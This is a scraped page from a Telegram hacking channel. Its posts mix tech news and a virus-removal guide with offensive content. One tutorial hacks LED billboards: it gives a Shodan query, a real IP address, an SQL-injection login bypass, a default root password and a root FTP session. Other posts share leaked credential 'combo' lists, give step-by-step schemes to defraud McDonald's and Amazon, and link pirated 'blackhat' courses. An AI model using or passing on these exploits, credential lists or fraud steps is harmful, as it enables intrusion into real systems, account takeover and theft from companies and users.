Hacking Python Course Coding
78.1K subscribers
222 photos
27 videos
77 files
749 links
Welcome to Techmate, Your Telegram Tech Partner πŸ‘₯

β€’ Tech Related Content
β€’ Daily Exciting Giveaways
β€’ Hacking content
β€’ other interesting stuffs

Official username - @Techm_8

πŸ€– Powered by - @Anonymous4Bhai
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
β€‹β€‹πŸ”°Top 10 Common Hacking Techniques All Beginners Should Know AboutπŸ”°

10. Keylogger
Keylogger is a simple software that records the key sequence and strokes of your keyboard into a log file on your machine. These log files might even contain your personal email IDs and passwords.

Keylogger is one of the main reasons why online banking sites give you an option to use their virtual keyboards.

9. Denial of Service (DoS\DDoS)
A Denial of Service attack is a hacking technique to take down a site or server by flooding that site or server with a lot of traffic that the server is unable to process all the requests in the real time and finally crashes down.

For DDoS attacks, hackers often deploy botnets or zombie computers which have got the only work to flood your system with request packets.

8. Waterhole attacks
If you are a big fan of Discovery or National Geographic channels, you could relate easily with the waterhole attacks. To poison a place, in this case, the hacker hits the most accessible physical point of the victim.

For example, if the source of a river is poisoned, it will hit the entire stretch of animals during summer. In the same way, hackers target the most accessed physical location to attack the victim. That point could be a coffee shop, a cafeteria etc.

Once hackers are aware of your timings, they might create a fake Wi-Fi access point and modify your most visited website to redirect them to you to get your personal information.

7. Fake WAP
Even just for fun, a hacker can use software to fake a wireless access point. This WAP connects to the official public place WAP. Once you get connected the fake WAP, a hacker can access your data, just like in the above case.

6. Eavesdropping (Passive Attacks)
Unlike other attacks which are active in nature, using a passive attack, a hacker just monitors the computer systems and networks to gain some unwanted information.

The motive behind eavesdropping is not to harm the system but to get some information without being identified.

5. Phishing
Phishing is a hacking technique using which a hacker replicates the most-accessed sites and traps the victim by sending that spoofed link.

Once the victim tries to login or enter some data, the hacker gets that private information of the target victim using the trojan running on the fake site.

4. Virus, Trojan etc.
Virus or trojans are malicious software programs which get installed into the victim’s system and keeps sending the victims data to the hacker.

3. ClickJacking Attacks
ClickJacking is also known by a different name, UI Redress. In this attack, the hacker hides the actual UI where the victim is supposed to click.

In another word, the attacker hijacks the clicks of the victim that aren’t meant for the exact page, but for a page where the hacker wants you to be.

2. Cookie theft
The cookies of a browser keep our personal data such as browsing history, username, and passwords for different sites that we access. Once the hacker gets the access to your cookie, he can even authenticate himself as you on a browser.

1. Bait and switch
Using bait and switch hacking technique, the hacker runs a malicious program which the user believes to be authentic. This way, after installing the malicious program on your computer, the hacker gets unprivileged access to your computer.


βž– @Techm8 βž–
πŸ‘4
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ¦‰[TUT] How to Hack BillboardsπŸ¦‰

Step 1. Register to shodan

Step 2. Look up: title:"lednet live system"

You'll find some!

Example: 
186.206.188.175:8060/en/main.html

How to hack it? Well the Username Parameter is vulnerable to SQL Injection......

So to login, paste

-1558" OR 9005=9005 AND "UxGI"="UxGI

in the username parameter and anything in the password input. Now click login!


Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards....

Username: root
Password: 111111

$ ftp 
186.206.188.175
Connected to 
186.206.188.175.
220 Welcome to blah FTP service.
Name ( 
186.206.188.175): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||41314|).
150 Here comes the directory listing.
drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
drwxr-xr-x 7 0 0 0 May 21 18:08 dev
lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
drwxr-xr-x 1 0 0 36 Jan 01 1970 home
drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
drwxr-xr-x 1 0 0 116 Jan 01 1970 root
drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
drwxr-xr-x 3 0 0 672 Jan 01 1970 var
drwxr-xr-x 4 0 0 288 Jan 01 1970 www
226 Directory send OK.
ftp>


You now have access to the entire server ;)

Enjoy!


βž–@Techm8βž–
πŸ”₯2
This media is not supported in your browser
VIEW IN TELEGRAM
β˜†β˜†β˜†β˜†πŸ’₯ Tech News πŸ’₯β˜†β˜†β˜†β˜†

🌐 Mi Charge Turbo Wireless Charging Tech to Launch on September 9, Xiaomi Confirms a(4,000mAh phone in just 17 minutes)

🌐 Chandrayaan-2 Moon Landing: India Time, How to Watch Live Stream Video by ISRO

🌐 Huawei FreeBuds 3 Unveiled With Active Noise Cancellation, Mate X May Go on Sale Next Month

🌐 Google Search Starts Showing Personalised TV Show, Movie Recommendations

🌐 Huawei Enjoy 10 Plus With 48-Megapixel Triple Rear Cameras Launched, price starts Rs. 15,100

🌐 Chandrayaan-2's Vikram Lander to Soft Land on the Moon Tonight, ISRO Details Process

🌐 Google Pixel 4 Series 90Hz Displays Confirmed by Android 10 Source Code: Report

🌐 Huawei Launches 5G-Capable HiSilicon Kirin 990 SoC at IFA 2019


🌐 Google Assistant Gets New Ambient Mode, Voice Command Support for WhatsApp Audio and Video Calls

🌐 Oppo to Bring Upgraded SuperVOOC Flash Charge Tech This Year in New Phone With 4,000mAh Battery

🌐 OnePlus TV Remote Revealed by CEO Pete Lau, Content Partnership With Eros Now Announced

🌐 Xiaomi Testing an Ad Switch Tool in MIUI to Let Users Opt Out of Seeing Ads

🌐 Apple Music Web Player Beta Is Now Live, Said to Work in All Browsers

🌐 Google Play Store Officially Gets UPI as a Payment Option

🌐 Samsung Galaxy Fold Pre-Orders Cancelled Before Relaunch
❀1πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”° 2Million HQ Combos πŸ”°

Use this Combos For Legendary Gaming / Streaming Accounts !

Link : http://bit.ly/2MCombosHQ

Share and Support Us ❗️

βž– @TechM8 βž–
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”° HOW TO GET MCDONALDS FOR FREE πŸ”°

πŸ‚ 1. Download the McDonalds app
2. Make an account
3. Go to your local McDonalds with the self order machines, they are everywhere
4. Use one of your build in coupon codes for a discount on food
5. Use the Coupon and take a screenshot of the QR code
6. Now goto a new machine and redeem the coupon
7. Now it will say that the code is invalid
8. Now go to a McDonalds service helper and tell them that u just tried to redeem (what ever food you want)
but it says invalid code, now they will go to the machine and see that it says invalid code, and they will now give you what ever you said you redeemed
9 Enjoy your free food
BONUS: (If one soda wasnt enough, then put a hair in your drink and tell them that there is a hair in it, then they will look and say, "we are sorry, we will provide you with a new one"
Enjoy another soda πŸ‚


βž– @Techm8 βž–
πŸ”₯2😱2
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”°Unlimited Amazon Balance Buy Anything For FreeπŸ”°

What You are Going to Need:

1. eBay Account.
2. PayPal with around $2-$3
3. Random Name Generator Details

Note: the reason you do not need an Amazon account prior to the method is because one will be created whilst carrying out the method.

Step 1. Head on over to
Amazon.com, and make your way to the β€˜trade-in’s’

Link:
http://www.amazon.com/Trade-In/b?node=2242532011

Step 2. On the Search Box below, select the Category as Electronics, and on the box next to it, type any electronics name, for e.g: Apple iPad.

Step 3. Once you’re on the electronics page, try and find an item between $300 and $400, $350 being the golden amount. Once you have found your item click on the 'Trade In' button.
Now, for account creation!

Step 4. You will now be asked to register/login into Amazon. This is where we will be creating our account, so click register and head on down to Step 5.

Step 5. Use fake details from
www.fakenamegenerator.com to register an account. Make sure the fake address is from the USA.
Also, be sure to save your generated details in a notepad document, I can guarantee you will need them later.

Step 6. Select 'Like New' on the page and then click on continue.

Step 7. On the 'Select a Shipping Method' , select the 'Carrier of Choice'

Step 8. On the 'Enter and Address' fields, enter the details that you previously generated using
fakenamegenerator.com.

Step 10. On the next page, that says 'Select a Return Option', select the 'Do not return the item' option

Step 11. Click on 'Submit your Trade In' and you are almost done.

Step 12. Now go to
eBay.com and find a product that is about $2 or $3. Use the address given by Amazon as the shipping address, and buy the product from eBay. Once you have purchased the product from eBay, now you will get tracking number that will show that your product has been delivered to Amazon’s address!

βž– @Techm8 βž–
πŸ‘3
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”° EARN 10-50$ DAILY ( LEGIT ) πŸ”°

πŸ”₯ NEW LINK SHORTENER πŸ”₯

βœ…CPM : 8$+ (India)
βœ…Withdraw : paytm,paypal,upi etc
βœ…minimum withdraw : 2$

πŸ’‹ SOME EXTRA REWARDS FOR CREATORS . NO POPUPS AD .

JOIN FAST : CLICK HERE

❀️Get a Sign up Bonus If u Joined via above link

βž– @TechM8 βž–
❀‍πŸ”₯1πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ‘1
πŸ”₯【PACK】πŸ”₯
πŸ”°Dedsec Complete Course Collection Pack Of 6 CourseπŸ”°
━━━━━━━━━━━━━━

◾️Advance Course Of Wifi Hacking
◾️Complete Android Hacking Course
◾️Complete Course Of Blackhat
◾️Facebook & Instagram Hacking Course
◾️Ethical Hacking Reverse
◾️Engineering & Cracking [ERC] Course
◾️Complete Course Of Kali Linux

βž–Link :

https://xendrive.ru/R7j0EY7/hacking-course-by-decsec-zip#dl

Password : forum.blackhatindia.ru
πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
❌ GUYS I AM GOING TO REAVEL ONE THING ABOUT CARDING AND FAKE SIMS ❌

⚠️Hello guys A very important message to you all that as you know that carding is illegal and many normal peoples used to used to buy carding products so that they can get the product at very cheap price.

All the carders used to scam peoples to get the Money. IF A Carder can card any product in no price than he can also sell at nearby places but why they won't sell its Because its cant be done and thats why carders used to sell on social media platforms ,they also selling fake sims so that people can also fraud.

Carders always use fake sims so that no can can trace I would like to inform you that stay away from this carding/Carder and don't buy any fake Sims because you may be traced and arrested by police & help you help you all.⚠️


❌Note:- Stay Away from Carders,Fake Sims & Paytm Double etc.❌

Offical Message⚠️
@TechM8
πŸ”₯1
πŸ”°How To Remove Shortcut Virus From Your PcπŸ”°

βœ… Method 1.

- Clean up and remove Shortcut Virus by CMD -

1. Click on  Start  and select  Run;

2. Type: CMD  and Hit Enter to open  Command Prompt;

3. Type the  drive letter  of your hard drive partition in PC or USB flash drive and hit Enter; (G for example.)

4. Type:  attrib g:*.* /d /s -h -r -s  and hit Enter.

You’ll be able to see your files and data on Windows PC or USB flash drive now.

βœ…Method 2.

-Cleanup Shortcut Virus with Shortcut Virus Remover or Anti-virus Software-

*If you need a double guarantee, you can download and install anti-virus software to clean up all shortcut virus from Windows 10/8/7 computer and USB etc external storage devices. Here below you’ll see a list of anti-virus software and tools and you can selectively choose one to try*

➑️Trojan Removal Tool;

➑️Shortcut virus fixfolder;

➑️Malwarebytes Anti-Malware, etc.

βœ…Method 3.

- Delete/Wipe Shortcut Virus from Registry -

1. Press Win+R and type: regedit to enter the registry;

2. Navigate to HKEY_CURRENT_USER > Click on Software > Microsoft > Windows >CurrentVersion > Click Run;

3. Press Win + R, type: msconfig > Click OK;

4. In Startup, uncheck everything except for the anti-virus software.

5. Click OK > Click Restart now.

βœ… Method 4

- Remove It By .bat File -

1. Open notepad

2. Copy  &  paste  below given  code

@echo off

attrib -h -s -r -a /s /d Name_Drive:*.*

attrib -h -s -r -a /s /d Name_Drive:*.*

attrib -h -s -r -a /s /d Name_Drive:*.*

@echo complete

3. Save  the file with  remove virus.bat

"Now replace the  Name_drive  with infected  drive name , if you have more than 3 drive simply  copy  and  paste  the command"

4. Now simply  close the file and run it.

-Once everything done …remove  file from drive and  folder  too-


βž– @Techm8 βž–
πŸ‘5
This media is not supported in your browser
VIEW IN TELEGRAM